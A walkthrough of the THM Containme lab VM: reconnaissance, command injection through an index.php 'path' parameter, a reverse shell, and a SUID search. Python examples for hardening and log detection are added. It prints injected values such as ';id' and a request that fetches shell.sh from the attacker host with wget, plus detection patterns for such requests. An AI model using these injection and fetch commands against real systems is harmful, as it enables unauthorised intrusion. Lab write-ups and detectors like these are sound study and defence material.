
Vulnhub THM Containme walkthrough

Posted: 2022-11-06 18:22:09

THM Containme v4

Identifying the target's IP address

Start the THM Containme target in VirtualBox and use netdiscover on Kali Linux to identify its IP address:

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.93.0/16   |   Screen View: Unique Hosts                                                                                                                                                                      
                                                                                                                                                                                                                                          
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120                                                                                                                                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                         
 192.168.56.100  08:00:27:f8:f5:bb      1      60  PCS Systemtechnik GmbH 

The target's IP address cannot be identified: neither of the two IP addresses in the table belongs to the target machine.

So the first thing to fix is that the target has not obtained an IP address:

Reboot the target and hold down the Shift key until the screen below appears:

Then press e to enter edit mode, find the line containing ro, change ro to rw single init=/bin/bash, and delete the rest of that line after it.

Press Ctrl+x to boot the target. Run ip a to get the name of the network interface, then edit /etc/netplan/01-netcfg.yaml with vi so that the interface name in it matches, and reboot the target.
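The interface-name fix above can be scripted. The following is an added example written for this edit, not code from the original post: it picks the first non-loopback interface out of `ip -o link` output and rewrites the single interface key under `ethernets:` in the netplan file, without needing a YAML library on a box that has no internet access. The `ip -o link` text and the netplan file it operates on are constructed samples; the real interface name enp0s3 and the stale key name ens33 are assumptions, and the MAC in the sample is the target's MAC from the Nmap output.

```python
import re

# Constructed sample of `ip -o link` output (not captured from the target).
# The interface name enp0s3 is assumed; the MAC is the target's from the Nmap scan.
SAMPLE_IP_LINK = (
    "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN "
    "mode DEFAULT group default qlen 1000\\    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n"
    "2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP "
    "mode DEFAULT group default qlen 1000\\    link/ether 08:00:27:d0:a0:36 brd ff:ff:ff:ff:ff:ff\n"
)

# Constructed netplan file with a stale interface name (ens33 is assumed).
SAMPLE_NETPLAN = """\
network:
  version: 2
  renderer: networkd
  ethernets:
    ens33:
      dhcp4: true
"""


def first_ethernet_from_ip_link(output):
    """Return the first non-loopback interface name in `ip -o link` output."""
    for line in output.splitlines():
        m = re.match(r"^\d+:\s+([^:@\s]+)[@:]", line)
        if m and m.group(1) != "lo":
            return m.group(1)
    raise ValueError("no non-loopback interface found")


def ethernet_names_in_netplan(yaml_text):
    """Collect the interface keys directly under 'ethernets:' by indentation,
    so no YAML library is needed on a box without internet access."""
    names = []
    in_ethernets = False
    ethernets_indent = child_indent = None
    for line in yaml_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        indent = len(line) - len(line.lstrip())
        if stripped == "ethernets:":
            in_ethernets, ethernets_indent, child_indent = True, indent, None
            continue
        if not in_ethernets:
            continue
        if indent <= ethernets_indent:  # left the ethernets mapping
            in_ethernets = False
            continue
        if child_indent is None:
            child_indent = indent
        if indent == child_indent and stripped.endswith(":"):
            names.append(stripped[:-1])
    return names


def rename_ethernet(yaml_text, old_name, new_name):
    """Rewrite exactly one '<old_name>:' key line, keeping its indentation."""
    pattern = re.compile(r"^(\s+)" + re.escape(old_name) + r":\s*$", re.MULTILINE)
    new_text, count = pattern.subn(lambda m: m.group(1) + new_name + ":", yaml_text)
    if count != 1:
        raise ValueError("expected one '%s:' key, found %d" % (old_name, count))
    return new_text


def fix_netplan(yaml_text, ip_link_output):
    """Return (new_yaml, real_interface, changed)."""
    actual = first_ethernet_from_ip_link(ip_link_output)
    configured = ethernet_names_in_netplan(yaml_text)
    if len(configured) != 1:
        raise ValueError("expected one configured interface, found %r" % configured)
    if configured[0] == actual:
        return yaml_text, actual, False
    return rename_ethernet(yaml_text, configured[0], actual), actual, True


if __name__ == "__main__":
    new_yaml, iface, changed = fix_netplan(SAMPLE_NETPLAN, SAMPLE_IP_LINK)
    print("real interface: %s, file changed: %s" % (iface, changed))
    print(new_yaml)
```

On the target you would feed `fix_netplan` the real file contents and the real `ip -o link` output, write the result back to /etc/netplan/01-netcfg.yaml, and then reboot as the walkthrough does (or run `sudo netplan apply`).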

The target now gets an IP address:

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.4.0/16   |   Screen View: Unique Hosts                                                                                                                                                                        
                                                                                                                                                                                                                                          
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                                                                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                         
 192.168.56.100  08:00:27:f8:f5:bb      2     120  PCS Systemtechnik GmbH                                                                                                                                                                 
 192.168.56.154  08:00:27:d0:a0:36      1      60  PCS Systemtechnik GmbH                                                                                                                                                                 


Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.154 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-06 02:49 EST
Nmap scan report for bogon (192.168.56.154)
Host is up (0.00014s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:3e:80:d9:b0:98:fd:7e:09:6d:34:12:f9:15:8a:18 (RSA)
|   256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
|_  256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
2222/tcp open  EtherNetIP-1?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
8022/tcp open  ssh           OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
|   256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
|_  256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
MAC Address: 08:00:27:D0:A0:36 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.36 seconds

Get Access

Visiting http://192.168.56.154 in a browser returns the Apache default page, and its source contains nothing of value.

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/robots.txt   
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.154 Port 80</address>
</body></html>

                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ gobuster dir -u http://192.168.56.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.154
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/06 02:55:59 Starting gobuster in directory enumeration mode
===============================================================
Progress: 218865 / 220561 (99.23%)===============================================================
2022/11/06 02:56:31 Finished
===============================================================
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ gobuster dir -u http://192.168.56.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.154
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,txt,sh,html
[+] Timeout:                 10s
===============================================================
2022/11/06 02:58:25 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/index.php            (Status: 200) [Size: 329]
/info.php             (Status: 200) [Size: 68960]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 1102308 / 1102805 (99.95%)===============================================================
2022/11/06 03:01:57 Finished
===============================================================
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ nikto -h http://192.168.56.154     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.154
+ Target Hostname:    192.168.56.154
+ Target Port:        80
+ Start Time:         2022-11-06 03:04:01 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/7.2.24-0ubuntu0.18.04.8
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.html, /index.php
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5c730c0d1fa4e, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2022-11-06 03:04:53 (GMT-5) (52 seconds)
---------------------------------------------------------------------------

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php    
<html>
<body>
        <pre>
        total 28K
drwxr-xr-x 2 root root 4.0K Jul 16  2021 .
drwxr-xr-x 3 root root 4.0K Jul 15  2021 ..
-rw-r--r-- 1 root root  11K Jul 15  2021 index.html
-rw-r--r-- 1 root root  154 Jul 16  2021 index.php
-rw-r--r-- 1 root root   20 Jul 15  2021 info.php
        <pre>

<!--  where is the path ?  -->

</body>
</html>

The returned page contains the hint "where is the path?", so this page probably takes a parameter that can be fuzzed:

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ wfuzz -c -u http://192.168.56.154/index.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 60
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.154/index.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================

000003025:   200        11 L     22 W       149 Ch      "path"                                                                                                                                                                     
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 4587
Filtered Requests: 4586
Requests/sec.: 0

The parameter path was found; confirm it manually:

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php?path=../../../../../../../etc/
<html>
<body>
        <pre>
        total 676K
drwxr-xr-x 81 root root   4.0K Jul 30  2021 .
drwxr-xr-x 22 root root   4.0K Jul 15  2021 ..
-rw-------  1 root root      0 Jun 29  2021 .pwd.lock
drwxr-xr-x  3 root root   4.0K Jun 29  2021 NetworkManager
drwxr-xr-x  3 root root   4.0K Jun 29  2021 X11
drwxr-xr-x  3 root root   4.0K Jun 29  2021 acpi
-rw-r--r--  1 root root   3.0K Jun 29  2021 adduser.conf
drwxr-xr-x  2 root root   4.0K Jul 16  2021 alternatives
drwxr-xr-x  8 root root   4.0K Jul 19  2021 apache2
drwxr-xr-x  3 root root   4.0K Jun 29  2021 apparmor
drwxr-xr-x  9 root root   4.0K Jun 29  2021 apparmor.d
drwxr-xr-x  3 root root   4.0K Jun 29  2021 apport
drwxr-xr-x  7 root root   4.0K Jun 29  2021 apt
-rw-r-----  1 root daemon  144 Feb 20  2018 at.deny
-rw-r--r--  1 root root   2.3K Apr  4  2018 bash.bashrc
drwxr-xr-x  2 root root   4.0K Jun 29  2021 bash_completion.d
-rw-r--r--  1 root root    367 Jan 27  2016 bindresvport.blacklist
drwxr-xr-x  2 root root   4.0K May 27  2021 binfmt.d
drwxr-xr-x  3 root root   4.0K Jun 29  2021 ca-certificates
-rw-r--r--  1 root root   5.6K Jun 29  2021 ca-certificates.conf
drwxr-xr-x  4 root root   4.0K Jun 29  2021 cloud
drwxr-xr-x  2 root root   4.0K Jun 29  2021 console-setup
drwxr-xr-x  2 root root   4.0K Jul 15  2021 cron.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 cron.daily
drwxr-xr-x  2 root root   4.0K Jun 29  2021 cron.hourly
drwxr-xr-x  2 root root   4.0K Jun 29  2021 cron.monthly
drwxr-xr-x  2 root root   4.0K Jun 29  2021 cron.weekly
-rw-r--r--  1 root root    722 Nov 15  2017 crontab
drwxr-xr-x  2 root root   4.0K Jun 29  2021 cryptsetup-initramfs
-rw-r--r--  1 root root     54 Jun 29  2021 crypttab
drwxr-xr-x  4 root root   4.0K Jun 29  2021 dbus-1
-rw-r--r--  1 root root   2.9K Feb 28  2018 debconf.conf
-rw-r--r--  1 root root     11 Jun 25  2017 debian_version
drwxr-xr-x  3 root root   4.0K Jul 15  2021 default
-rw-r--r--  1 root root    604 Aug 13  2017 deluser.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 depmod.d
drwxr-xr-x  4 root root   4.0K Jun 29  2021 dhcp
drwxr-xr-x  2 root root   4.0K Jun 29  2021 dnsmasq.d
drwxr-xr-x  2 root root   4.0K Jun 29  2021 dnsmasq.d-available
drwxr-xr-x  4 root root   4.0K Jun 29  2021 dpkg
-rw-r--r--  1 root root     35 Jun 29  2021 ec2_version
-rw-r--r--  1 root root    106 Jun 29  2021 environment
-rw-r--r--  1 root root   1.3K Jun 28  2018 ethertypes
-rw-r--r--  1 root root     43 Jun 29  2021 fstab
-rw-r--r--  1 root root    280 Jun 20  2014 fuse.conf
-rw-r--r--  1 root root   2.6K Feb  1  2018 gai.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 groff
-rw-r--r--  1 root root    639 Jul 19  2021 group
-rw-r--r--  1 root root    720 Jul 15  2021 group-
-rw-r-----  1 root shadow  530 Jul 19  2021 gshadow
-rw-r-----  1 root shadow  607 Jul 15  2021 gshadow-
drwxr-xr-x  3 root root   4.0K Jun 29  2021 gss
-rw-r--r--  1 root root     92 Apr  9  2018 host.conf
-rw-r--r--  1 root root      6 Jul 14  2021 hostname
-rw-r--r--  1 root root    221 Jun 28  2021 hosts
-rw-r--r--  1 root root    411 Jun 29  2021 hosts.allow
-rw-r--r--  1 root root    711 Jun 29  2021 hosts.deny
drwxr-xr-x  2 root root   4.0K Jul 30  2021 init.d
-rw-r--r--  1 root root   1.8K May 15  2017 inputrc
drwxr-xr-x  4 root root   4.0K Jun 29  2021 iproute2
drwxr-xr-x  2 root root   4.0K Jun 29  2021 iscsi
-rw-r--r--  1 root root     26 Aug 13  2020 issue
-rw-r--r--  1 root root     19 Aug 13  2020 issue.net
drwxr-xr-x  4 root root   4.0K Jun 29  2021 kernel
-rw-r--r--  1 root root    110 Jun 29  2021 kernel-img.conf
-rw-r--r--  1 root root    18K Jul 30  2021 ld.so.cache
-rw-r--r--  1 root root     34 Jan 27  2016 ld.so.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 ld.so.conf.d
drwxr-xr-x  2 root root   4.0K Jun 29  2021 ldap
-rw-r--r--  1 root root    267 Apr  9  2018 legal
-rw-r--r--  1 root root    191 Feb  7  2018 libaudit.conf
lrwxrwxrwx  1 root root     30 Jul 15  2021 localtime -> /usr/share/zoneinfo/US/Central
drwxr-xr-x  4 root root   4.0K Jun 29  2021 logcheck
-rw-r--r--  1 root root    11K Jan 25  2018 login.defs
drwxr-xr-x  2 root root   4.0K Jul 15  2021 logrotate.d
-rw-r--r--  1 root root    105 Aug 13  2020 lsb-release
drwxr-xr-x  3 root root   4.0K Jun 29  2021 lvm
-r--r--r--  1 root root     33 Jul 14  2021 machine-id
-rw-r--r--  1 root root    111 May 12  2020 magic
-rw-r--r--  1 root root    111 May 12  2020 magic.mime
-rw-r--r--  1 root root   1.9K Jun 29  2021 mailcap
-rw-r--r--  1 root root    449 Jul 15  2016 mailcap.order
drwxr-xr-x  2 root root   4.0K Jun 29  2021 mdadm
-rw-r--r--  1 root root    24K Jul 15  2016 mime.types
-rw-r--r--  1 root root    812 Mar 24  2018 mke2fs.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 modprobe.d
-rw-r--r--  1 root root    195 Jun 29  2021 modules
drwxr-xr-x  2 root root   4.0K Jul 30  2021 modules-load.d
lrwxrwxrwx  1 root root     19 Jun 29  2021 mtab -> ../proc/self/mounts
-rw-r--r--  1 root root   8.9K Feb 13  2018 nanorc
drwxr-xr-x  2 root root   4.0K Jul 15  2021 netplan
drwxr-xr-x  4 root root   4.0K Jun 29  2021 network
drwxr-xr-x  6 root root   4.0K Jun 29  2021 networkd-dispatcher
-rw-r--r--  1 root root     91 Apr  9  2018 networks
-rw-r--r--  1 root root    513 Jun 29  2021 nsswitch.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 opt
lrwxrwxrwx  1 root root     21 Aug 13  2020 os-release -> ../usr/lib/os-release
-rw-r--r--  1 root root    112 Jun 29  2021 overlayroot.local.conf
-rw-r--r--  1 root root    552 Apr  4  2018 pam.conf
drwxr-xr-x  2 root root   4.0K Jul 30  2021 pam.d
-rw-r--r--  1 root root   1.4K Jul 19  2021 passwd
-rw-r--r--  1 root root   1.5K Jul 16  2021 passwd-
drwxr-xr-x  4 root root   4.0K Jun 29  2021 perl
drwxr-xr-x  3 root root   4.0K Jul 15  2021 php
drwxr-xr-x  3 root root   4.0K Jun 29  2021 pm
drwxr-xr-x  2 root root   4.0K Jun 29  2021 pollinate
-rw-r--r--  1 root root    596 Jul 15  2021 profile
drwxr-xr-x  2 root root   4.0K Jun 29  2021 profile.d
-rw-r--r--  1 root root   2.9K Dec 25  2016 protocols
drwxr-xr-x  2 root root   4.0K Jun 29  2021 python3
drwxr-xr-x  2 root root   4.0K Jun 29  2021 python3.6
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc0.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc1.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc2.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc3.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc4.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc5.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc6.d
drwxr-xr-x  2 root root   4.0K Jun 29  2021 rcS.d
lrwxrwxrwx  1 root root     39 Jun 29  2021 resolv.conf -> ../run/systemd/resolve/stub-resolv.conf
-rwxr-xr-x  1 root root    268 Jul 21  2017 rmt
-rw-r--r--  1 root root    887 Dec 25  2016 rpc
drwxr-xr-x  2 root root   4.0K Jun 29  2021 rsyslog.d
-rw-r--r--  1 root root   4.1K Jan 25  2018 securetty
drwxr-xr-x  4 root root   4.0K Jun 29  2021 security
drwxr-xr-x  2 root root   4.0K Jun 29  2021 selinux
-rw-r--r--  1 root root    19K Dec 25  2016 services
-rw-r-----  1 root shadow  841 Jul 19  2021 shadow
-rw-r-----  1 root shadow  966 Jul 15  2021 shadow-
-rw-r--r--  1 root root     73 Jun 29  2021 shells
drwxr-xr-x  2 root root   4.0K Jun 29  2021 skel
drwxr-xr-x  6 root root   4.0K Jun 29  2021 sos
drwxr-xr-x  2 root root   4.0K Jul 15  2021 ssh
drwxr-xr-x  4 root root   4.0K Jun 29  2021 ssl
-rw-r--r--  1 root root     53 Jul 19  2021 subgid
-rw-r--r--  1 root root     73 Jul 15  2021 subgid-
-rw-r--r--  1 root root     53 Jul 19  2021 subuid
-rw-r--r--  1 root root     73 Jul 15  2021 subuid-
-r--r-----  1 root root    755 Jan 19  2021 sudoers
drwxr-x---  2 root root   4.0K Jul 14  2021 sudoers.d
-rw-r--r--  1 root root   2.7K Jan 17  2018 sysctl.conf
drwxr-xr-x  2 root root   4.0K Jul 30  2021 sysctl.d
drwxr-xr-x  5 root root   4.0K Jul 30  2021 systemd
drwxr-xr-x  2 root root   4.0K Jun 29  2021 terminfo
-rw-r--r--  1 root root     11 Jul 15  2021 timezone
drwxr-xr-x  2 root root   4.0K Jun 29  2021 tmpfiles.d
-rw-r--r--  1 root root   1.3K Feb 25  2018 ucf.conf
drwxr-xr-x  4 root root   4.0K Jul 30  2021 udev
drwxr-xr-x  3 root root   4.0K Jun 29  2021 ufw
drwxr-xr-x  3 root root   4.0K Jun 29  2021 update-manager
drwxr-xr-x  2 root root   4.0K Jun 29  2021 update-motd.d
drwxr-xr-x  2 root root   4.0K May 14  2021 update-notifier
-rw-r--r--  1 root root   4.9K Apr  8  2019 wgetrc
drwxr-xr-x  4 root root   4.0K Jun 29  2021 xdg
        <pre>

<!--  where is the path ?  -->

</body>
</html>

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php?path=../../../../../../../etc/passwd
<html>
<body>
        <pre>
        -rw-r--r-- 1 root root 1.4K Jul 19  2021 ../../../../../../../etc/passwd
        <pre>

<!--  where is the path ?  -->

</body>
</html>

                                                                                                                                                                                                                                            

The script does not display file contents; it appears to run ls -alh on the supplied path.

Try chaining a second command onto it:


┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl "http://192.168.56.154/index.php?path=../../../../../../../etc/passwd;id"                      
<html>
<body>
        <pre>
        -rw-r--r-- 1 root root 1.4K Jul 19  2021 ../../../../../../../etc/passwd
uid=33(www-data) gid=33(www-data) groups=33(www-data)
        <pre>

<!--  where is the path ?  -->

</body>
</html>



Note that the full URL must be quoted; otherwise the shell on Kali treats the ; as a command separator and runs id locally.

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl "http://192.168.56.154/index.php?path=../../../../../../../etc/passwd;cat /etc/passwd"
curl: (3) URL using bad/illegal format or missing URL

The cat command does not seem to get through this way: curl refuses the URL because of the unencoded space in cat /etc/passwd (curl error 3 is a client-side URL-format error, so this request never reached the target).
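What makes index.php exploitable is the pattern behind it: the request value is concatenated into a shell command line. The Python below is an added example written for this edit, not the target's index.php (which is PHP and is not shown on the page): `vulnerable_command` builds the same kind of command string to show why a value ending in `;id` carries a second command, and `safe_listing` is the hardened form, which never invokes a shell and confines the canonicalised path to a web root. The temporary web root, its `uploads` subdirectory and `note.txt` are constructed for the demo.

```python
import os
import stat
import tempfile


def vulnerable_command(user_path):
    """The unsafe pattern: the request value is pasted into a shell command
    string unchanged, so a value ending in ';id' carries a second command.
    Shown only as the string it would build; nothing is executed here."""
    return "ls -alh " + user_path


def resolve_within(base_dir, user_path):
    """Canonicalise user_path relative to base_dir and reject anything that
    resolves outside it (../ traversal, absolute paths, symlink escapes)."""
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError("path escapes the web root: %r" % user_path)
    return candidate


def safe_listing(base_dir, user_path):
    """Hardened replacement for 'ls -alh $path': no shell is involved at all,
    and the directory must live under base_dir."""
    target = resolve_within(base_dir, user_path)
    rows = []
    with os.scandir(target) as entries:
        for entry in sorted(entries, key=lambda e: e.name):
            st = entry.stat(follow_symlinks=False)
            rows.append("%s %6d %s" % (stat.filemode(st.st_mode), st.st_size, entry.name))
    return rows


def demo():
    """Build a throw-away web root (constructed data) and exercise both paths."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.mkdir(os.path.join(root, "uploads"))
    with open(os.path.join(root, "uploads", "note.txt"), "w") as fh:
        fh.write("constructed sample file\n")

    injected = "../../../../../../../etc/passwd;id"  # the value used on this page
    blocked = {}
    for probe in (injected, "/etc", "uploads/../.."):
        try:
            safe_listing(root, probe)
            blocked[probe] = False
        except ValueError:
            blocked[probe] = True
    return {
        "injected_command": vulnerable_command(injected),
        "listing": safe_listing(root, "uploads"),
        "blocked": blocked,
    }


if __name__ == "__main__":
    result = demo()
    print("unsafe command line would be:", result["injected_command"])
    print("hardened listing:", *result["listing"], sep="\n  ")
    print("escape attempts blocked:", result["blocked"])
```

The two defences are independent: confining the path stops the directory traversal seen on this page, and building the listing with `os.scandir` instead of a shell string removes the command injection even for paths that are inside the web root.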

Next, try to establish a reverse shell.

A shell could not be established directly from the injected command, so create a shell.sh script locally on Kali and upload it to the target:

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.154 - - [06/Nov/2022 03:24:42] "GET /shell.sh HTTP/1.1" 200 -

http://192.168.56.154/index.php?path=../../../../../../../etc/;wget%20-P%20/tmp%20http://192.168.56.137:8000/shell.sh
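Both of the requests that matter here leave a clear trace in Apache's access log: the `;id` probe and the `wget` staging request. The detector below is an added example written for this edit, not part of the original post or of the target. It runs over four constructed access-log lines modelled on the requests in this walkthrough (timestamps and byte counts are made up; the client address is the Kali box's) and flags any query value that contains `../`, shell metacharacters, or a download tool name.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache access-log lines modelled on this walkthrough's requests.
# Timestamps and byte counts are made up; the client is the Kali box's address.
SAMPLE_ACCESS_LOG = """\
192.168.56.137 - - [06/Nov/2022:03:05:10 -0500] "GET /index.html HTTP/1.1" 200 10918
192.168.56.137 - - [06/Nov/2022:03:14:02 -0500] "GET /index.php?path=../../../../../../../etc/ HTTP/1.1" 200 5312
192.168.56.137 - - [06/Nov/2022:03:18:55 -0500] "GET /index.php?path=../../../../../../../etc/passwd;id HTTP/1.1" 200 149
192.168.56.137 - - [06/Nov/2022:03:24:42 -0500] "GET /index.php?path=../../../../../../../etc/;wget%20-P%20/tmp%20http://192.168.56.137:8000/shell.sh HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
SHELL_META = re.compile(r"[;|&`\n]|\$\(")   # command separators / substitution
FETCH_TOOL = re.compile(r"\b(wget|curl)\b")  # download tools used to stage files


def query_values(target):
    """Decode the query string by hand: split only on '&' so that ';' stays
    inside the value (older urllib.parse.parse_qs treated ';' as a separator
    and would hide exactly the payload we want to see)."""
    pairs = []
    for pair in urlsplit(target).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def classify(target):
    """Return sorted reason tags for one request target, [] if it looks benign."""
    reasons = set()
    for _, value in query_values(target):
        if "../" in value:
            reasons.add("traversal")
        if SHELL_META.search(value):
            reasons.add("shell-metachar")
        if FETCH_TOOL.search(value):
            reasons.add("fetch-tool")
    return sorted(reasons)


def scan_access_log(lines):
    """Parse each log line and keep the ones whose query string is suspicious."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m.group("target"))
        if reasons:
            hits.append({"client": m.group("client"), "time": m.group("time"),
                         "target": m.group("target"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG.splitlines()):
        print("%s %s %s -> %s" % (hit["time"], hit["client"], hit["target"],
                                  ", ".join(hit["reasons"])))
```

The plain traversal request is reported on its own so that the reconnaissance step is visible before any command is chained; in a real deployment the `fetch-tool` tag combined with an outbound connection from the web server's user is the one worth paging on.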

A shell was obtained successfully:

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.154] 40230
bash: cannot set terminal process group (243): Inappropriate ioctl for device
bash: no job control in this shell
www-data@host1:/var/www/html$ 

www-data@host1:/var/www/html$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/usr/share/man/zh_TW/crypt
